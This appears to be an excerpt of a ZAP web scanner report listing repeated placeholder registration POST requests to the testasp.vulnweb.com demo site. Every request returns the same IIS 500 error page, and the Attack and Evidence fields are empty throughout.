HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 471 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:47 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 471 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:47 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 471 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:49 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:13 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
